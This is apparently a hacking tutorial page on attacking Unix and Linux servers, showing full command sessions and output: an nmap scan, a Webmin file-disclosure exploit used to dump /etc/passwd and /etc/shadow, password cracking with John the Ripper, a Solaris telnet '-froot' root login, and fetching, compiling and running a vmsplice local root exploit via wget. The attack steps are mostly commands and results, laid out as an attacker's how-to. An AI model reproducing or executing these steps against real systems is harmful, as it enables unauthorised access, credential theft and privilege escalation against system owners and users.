The Art of the Unix / Linux Attack (Part Two)

This Section will open with an article from Unixlegion discussing network vulnerabilities. It shows that, though The Art of the Unix and Linux Attack lesson may be considered outdated by some, a large portion of its general principles still apply even as technology advances.

 

Now that you have finished with Grey-Box Attack – The Art of Microsoft Windows Attack, it is time to move on to part of this tutorial: The Art of the Unix / Linux Attack.


We cover the following material:

[0x02a] – Scanning and Enumeration
[0x02b] – Gaining Access
[0x02c] – Escalating Privilege

[0x02] – The Art of Unix / Linux Attack

[0x02a] Lunix Attack- Scanning & Enumeration

The first thing of importance before begin a Unix / Lunix attack is to gather as much information as possible.
Any and all information that can be collected can be used to guess passwords, locate the best points of attack, and other pertinent information.

Remember: no little bit of information is useless or a waste of time collecting. The smallest thing could end up becoming a huge clue further on down the line.

As was discussed in the first section, an attacker’s favorite tool is nmap; it is what attachers use to scan the target system. The reader should already grasp the idea of port forwarding and the use of specific kinds of software with only one command.


bt cwh # nmap -sV www.target.com

Starting Nmap 4.76 ( http://nmap.org) 
Interesting ports on 192.168.0.111:
Not shown: 987 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 2.0.6
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
25/tcp open smtp Cisco PIX sanitized smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
111/tcp filtered rpcbind
443/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
554/tcp filtered rtsp
1720/tcp filtered H.323/Q.931
2000/tcp filtered callbook
3306/tcp open mysql MySQL (unauthorized)
5060/tcp filtered sip
10000/tcp open http Webmin httpd
Service Info: OSs: Unix, Linux; Device: firewall
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ 
Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds

In the result, one can see the system uses Webmin but it is unclear what the exact version is. Webmin is used to expose file disclosure vulnerabilities in version 1.290. In order to find Webmin, one must only go to http://milw0rm.com/exploits/2017.

Note: A vulnerability disclosure is the implementation of reporting security weaknesses in computer hardware and software.

bt cwh # perl 2017.pl www.target.com 10000 http /etc/passwd

root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
snort:x:1000:102::/home/snort:/bin/false
user1:x:1001:100::/home/user1:

One should note that the admin is outdated.

Unix & Lunix Attack

[0x02b] Linux Attack- Gaining Access

As the target is a linux server, it is more difficult than a windows server to attack remotely.

Most remote exploits capable of impacting Linux are third-party software, such as

File Transfer Protocol (FTP) and Secure Shell (SSH) web server. Attackers gain access to Linux servers by exploiting third party running services.

The most vital bits of information found in running third party services are the users’ information, usually located through web application vulnerabilities. Attackers then employ brute-force techniques, as well as social engineering to obtain information on valid users. In this case, it is highly recommended to use the command below.

bt cwh # perl 2017.pl www.target.com 10000 http /etc/shadow

The purpose of this commaned is to read the /etc/shadow file

root:$1$MKy0eqPM$auerQwMpGYcqgBqDddkfO/:13666:0:::::

bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
snort:!:13986:0:99999:7:::
user1:$1$RY88JSH8$1A73wdGEerLFulLzzTnHX0:14428:0:99999:7:::

The results are entered in the shadow.txt file. Then the attacker attempts to crack the systems’ passwords using John the Ripper.

We put the result in file shadow.txt and then try to crack passwords by using John the Ripper. (dict.lst is dictionary file)

bt cwh # john --wordlist=dict.lst shadow.txt
<em>Load two password hashes with two different salts</em> ( FreeBSD MD5 [32/32]) 
user1 (user1)
guesses: 1 time: 0:00:00:00 100% c/s: 150 trying: abc

This defines the password of “user one” as “user1” and cannot locate the password for root. The Linux attack should allow the individual to log in to the target system by using the credentials of “user1.” Once the attacker is inside the system, they must figure out a way to increase their user privileges.

An additional example is a telnet vulnerability on Solaris 10/11. This vulnerability allows the attacker to log in with little to no resistance with root privilege. The attacker simply sends [telnet “-froot” 192.168.0.112] to the telnet daemon on Solaris 10/11.

bt cwh # telnet "-froot" 192.168.0.112

Using: 192.168.0.112
Connected to 192.168.0.112.
Escape character is '^]'.
Last login: Sun Jun 30 02:02:02 from 192.168.0.2
Sun Microsystems Inc. SunOS 5.10 Generic January 2007
# id
uid=0(root) gid=0(root)
#

By using this technique, there is no need to escalate privilege since the attacker is already logged in under root privilege.

Unix / Lunix Attacks Escalation of Privileges

[0x02c] – Escalating Privilege

This article has been an introduction to a Lunix attack that exploits the Linux system’s local root.  These useful exploits can be found at milworm.com. The initial tasks after one has gained access to the Linux system are to check Linux kernel version and the user ID.

[email protected]:~$ uname -a
Linux linuxserver 2.6.17-10-server #2 SMP Fri Oct 13 18:47:26 UTC 2006 i686 GNU/Linux
[email protected]:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)

The two commands used in this Lunix attack are used to elevate the attacker’s privilege, making them the system’s root. Thus it should be mentioned that there is a local root exploit for Linux 2.6.17 – 2.6.24 on milworm.com. Once the root exploit is downloaded, compiled, and it is running, it will look like shown below.

[email protected]:~$ wget http://milw0rm.com/exploits/5092
--17:17:21-- http://milw0rm.com/exploits/5092
=&gt; `5092'
Resolving milw0rm.com... 76.74.9.18
Connecting to milw0rm.com|76.74.9.18|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified

[ >>> ] 7,197 11.58K/s
17:17:23 (11.58 KB/s) - `5092' saved [7197]
[email protected]:~$ gcc -o 5092 5092.c
5092.c:289:28: warning: no newline at end of file
[email protected]:~$ ./5092
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e79000 .. 0xb7eab000
[+] root
[email protected]:~# id
uid=0(root) gid=0(root) groups=1001(root)

At this point, the attacker has, in essence, become the root of the targeted system’s server.


When you are done studying this section, please continue to SQL Injection Cheat Sheet | Auto Pwn | Metasploit.

Leave a Reply